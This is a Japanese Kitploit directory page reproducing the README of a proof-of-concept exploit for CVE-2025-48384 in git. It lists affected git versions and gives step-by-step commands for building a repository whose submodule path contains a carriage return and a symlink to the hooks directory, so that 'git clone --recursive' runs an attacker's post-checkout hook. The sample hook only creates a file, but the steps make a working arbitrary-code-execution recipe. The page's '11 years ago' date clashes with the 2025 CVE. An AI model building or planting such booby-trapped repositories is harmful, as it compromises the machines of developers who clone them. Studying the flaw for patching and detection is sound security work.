Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48384-poc — CVE-2025-48384 の PoC | Kitploit
ツール/GitHubGitHub/jacobholtz/cve-2025-48384-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育ペイロード開発
GitHubjacobholtz/cve-2025-48384-poc

CVE-2025-48384-poc

CVE-2025-48384 の PoC

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-48384-poc

CVE-2025-48384 は、git における不適切なリンク解決(リンク追従)の脆弱性です。具体的には、.git/config 内でキャリッジリターンを含むファイル名が適切に解析されず、git clone --recursive でリポジトリがクローンされると、サブモジュール内にある git フック実行ファイルを指すシンボリックリンクをサブモジュールのフックディレクトリとして含めることで、任意のコード実行が引き起こされる可能性があります。

Git for Microsoft Windows はこの脆弱性の影響を受けず、主に linux と MacOS 上の特定の git バージョンが影響を受けます。影響を受けるバージョン:

  • v2.50.0
  • v2.49.0
  • v2.48.0-v2.48.1
  • v2.47.0–v2.47.2
  • v2.46.0–v2.46.3
  • v2.45.0-v2.45.3
  • v2.44.0–v2.44.3
  • v2.43.6 and prior

PoC を再現する手順:

  1. poc と submodule の2つのリポジトリを作成する
  2. submodule 内に、poc リポジトリが再帰的にクローンされたときにコードを実行する post-checkout git フックを作成する:
root@kitploit:~
#!/bin/bash
touch ~/hackedlol
  1. poc 内で、git submodule add https://github.com/<your submodule repo>.git sub を使用してサブモジュールリポジトリを追加する
  2. 新しく作成された sub フォルダに git mv sub $(printf "sub\r") でキャリッジリターンを追加する
  3. .gitmodules に printf "\tpath = \"sub\r\"\n" を出力し、元のパスを削除する
ツールをダウンロード
  • ローカルの .git ディレクトリ内の hooks フォルダへのシンボリックリンクを ln -s .git/modules/sub/hooks sub で作成する
  • すべてをリポジトリに追加する
  • うまくいけばいいね(笑)
  • 情報源

    • https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
    • https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f